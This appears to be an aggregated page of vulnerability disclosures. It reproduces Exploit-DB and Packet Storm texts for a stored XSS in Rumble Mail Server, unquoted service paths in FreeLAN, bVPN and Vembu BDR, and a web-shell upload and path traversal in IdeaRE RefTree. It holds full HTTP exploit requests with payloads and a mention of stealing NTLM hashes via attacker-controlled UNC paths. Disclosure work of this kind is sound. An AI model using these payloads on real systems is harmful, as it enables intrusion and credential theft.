Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /settings:save HTTP/1.1
    Host: 127.0.0.1:2580
    Connection: keep-alive
    Content-Length: 343
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YWRtaW4=
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:2580
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1:2580/settings
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    
    save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
    HTTP/1.1 302 Moved
    Location: /settings:save
    
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on <script>alert(xss.com)</script><br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h1>Server settings</h1>
    
    Saving config/rumble.conf
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43461: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in FreeLAN 2.2 via a specially crafted file in the FreeLAN Service path.

    # Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
    # Date: 2021-1-20
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: www.freelan.org
    # Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe
    # Version: Version 2.2
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "FreeLAN Service"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: FreeLAN Service
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\FreeLAN\bin\freelan.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : FreeLAN Service
            DEPENDENCIES       : tap0901
                               : Dhcp
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43455: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in bVPN 2.5.1 via a specially crafted file in the waselvpnserv service path.

    # Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
    # Date: 2021-1-19
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
    # Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
    # Version: Version 2.5.1
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "waselvpnserv"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: waselvpnserv
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : waselvpnserv
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43457: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exits in Vembu BDR 4.2.0.1 via a specially crafted file in the (1) hsflowd, (2) VembuBDR360Agent, or (3) VembuOffice365Agent service paths.

    # Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
    # Date: 2020-11-6
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: https://www.vembu.com/
    # Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe
    # Version: Version 4.2.0.1 U1
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "hsflowd"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: hsflowd
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Host_sFlow_Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>sc qc "VembuBDR360Agent"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VembuBDR360Agent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VembuBDR360Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>sc qc "VembuOffice365Agent"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VembuOffice365Agent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VembuOffice365Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43458: Offensive Security’s Exploit Database Archive

An unrestricted file upload vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to execute arbitrary code by using UploadDwg to upload a crafted aspx file to the web root, and then visiting the URL for this aspx resource.

    ===============================================================================                  title: IdeaRE RefTree Remote Code Execution                product: IdeaRE RefTree < 2021.09.17     vulnerability type: Unrestricted File Upload                 CVE ID: CVE-2022-27249               severity: High           CVSSv3 score: 8.8          CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H                  found: 2021-09-13                     by: Savino Sisco saviosisco@gmail.com===============================================================================[EXECUTIVE SUMMARY]RefTree is a web application made for managing complex real estate situations.Among other features, it offers the possibility for authenticated usersto upload and download DWG (CAD drawings) files for buildings.During a penetration test activity, an "Unrestricted File Upload" vulnerabilitywas found which leverages the upload feature to upload a file anywhere on the target system.By uploading a malicious web page, like an aspx web shell, to the server'sweb root it is possible to achive code execution by just navigating to themalicious page with a web browser.[VULNERABLE VERSIONS]IdeaRE RefTree < 2021.09.17[TECHNICAL DETAILS]It is possible to reproduce the issue following these steps:1. Log into the application to get a valid session cookie2. Get a valid "ObjId" from the application (the ID of a building to associate   the file to)3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'   to upload a file on the target system, for example a web shell in the   server's web root4. Navigate to the new page with a web browser to trigger code executionExample of the HTTP request to the Upload endpoint:POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2Host: [REDACTED]Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouyUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 2211Origin: https://[REDACTED]Referer: https://[REDACTED]/Reftreespace/{  "FileContent": "[BASE64_PAYLOAD]",  "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",  "UploadType": "WorkingCopy",  "ObjId": 4774726,  "ObjType": 5,  "UpdateState": true,  "DwgOp": 23}HTTP/2 200 OKCache-Control: privateContent-Type: application/json; charset=utf-8Server: Microsoft-IIS/10.0Access-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: [REDACTED]X-Powered-By: ASP.NETDate: Fri, 10 Sep 2021 15:00:53 GMTContent-Length: 24{"UploadDwgResult":null}[VULNERABILITY REFERENCE]The following CVE ID was allocated to track the vulnerabilities:CVE-2022-27249[DISCLOSURE TIMELINE]2021-09-13  Vulnerability disclosed to our customer and the vendor.            Vendor acknowledged the issue.2021-09-17  Vendor released a fix for the software.2021-10-15  The vulnerability was rechecked in the newer version to confirm             that is was indeed fixed.2022-03-15  Researcher requested to publicly disclose the issue; public            coordinated disclosure.[RESOLUTION]Update the software to a version >= 2021.09.17Savino Sisco <saviosisco@gmail.com>https://www.linkedin.com/in/savino-sisco/

CVE-2022-27249: IdeaRE RefTree Shell Upload ≈ Packet Storm

A directory traversal vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to download arbitrary .dwg files from a remote server by specifying an absolute or relative path when invoking the affected DownloadDwg endpoint. An attack uses the path field to CaddemServiceJS/CaddemService.svc/rest/DownloadDwg.

`===============================================================================   title: IdeaRE RefTree Download Path Traversal   product: IdeaRE RefTree < 2021.09.17   vulnerability type: Directory Traversal   CVE ID: CVE-2022-27248   severity: Medium   CVSSv3 score: 4.3   CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N   found: 2021-09-13   by: Savino Sisco <saviosisco@gmail.com>   ===============================================================================  [EXECUTIVE SUMMARY]   RefTree is a web application made for managing complex real estate situations.   Among other features, it offers the possibility for authenticated users   to upload and download DWG (CAD drawings) files for buildings.  During a penetration test activity, a "Directory Traversal" vulnerability   was found on the download feature which allows to download arbitrary files   with the "dwg" extension. The application actually checks that the filename   ends with "dwg", so it's not possible to download files with other extensions.  This vulnerability may also allow to steal NTLM hashes of the host system   by supplying, as the download path, a UNC path pointing to an   attacker controlled machine running a tool like Responder.  [VULNERABLE VERSIONS]   IdeaRE RefTree < 2021.09.17  [TECHNICAL DETAILS]   It is possible to reproduce the issue following these steps:   1. Log into the application to get a valid session cookie   2. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/DownloadDwg'   to download an arbitrary "dwg" file (UNC paths are accepted).  Example of the request to the Download endpoint:  POST /CaddemServiceJS/CaddemService.svc/rest/DownloadDwg HTTP/2   Host: [REDACTED]   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0   Accept: application/json, text/plain, */*   Accept-Language: en-US,en;q=0.5   Accept-Encoding: gzip, deflate   Content-Type: application/json   Content-Length: 111   Origin: https://[REDACTED]   Referer: https://[REDACTED]/Reftreespace/   Cookie: ASP.NET_SessionId=dezu5r0zswyqk4dukwt5jt5n  {   "path": "C:\\Users\\Public\\test.dwg"   }  HTTP/2 200 OK   Cache-Control: private   Content-Type: application/json; charset=utf-8   Server: Microsoft-IIS/10.0   Access-Control-Allow-Credentials: true   Access-Control-Allow-Origin: https://[REDACTED]   X-Powered-By: ASP.NET   Date: Thu, 10 Oct 2021 11:21:32 GMT   Content-Length: 241916  {"DownloadDwgResult":[BASE64_FILE_REDACTED]}  [VULNERABILITY REFERENCE]   The following CVE ID was allocated to track the vulnerabilities:   CVE-2022-27248  [DISCLOSURE TIMELINE]   2021-09-13 Vulnerability disclosed to our customer and the vendor.   Vendor acknowledged the issue.   2021-09-17 Vendor released a fix for the software.   2021-10-15 The vulnerability was rechecked in the newer version to confirm   that is was indeed fixed.   2022-03-15 Researcher requested to publicly disclose the issue; public   coordinated disclosure.  [RESOLUTION]   Update the software to a version >= 2021.09.17  [CONTACT DETAILS]   Savino Sisco <saviosisco@gmail.com>   https://www.linkedin.com/in/savino-sisco/  `

CVE-2022-27248: IdeaRE RefTree Path Traversal ≈ Packet Storm

Improper Input Validation vulnerability in ABB 800xA, Control Software for AC 800M, Control Builder Safe, Compact Product Suite - Control and I/O, ABB Base Software for SoftControl allows an attacker to cause the denial of service.

CVE-2021-22277

**Why is Attack Complexity marked as High for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.

Tag

#microsoft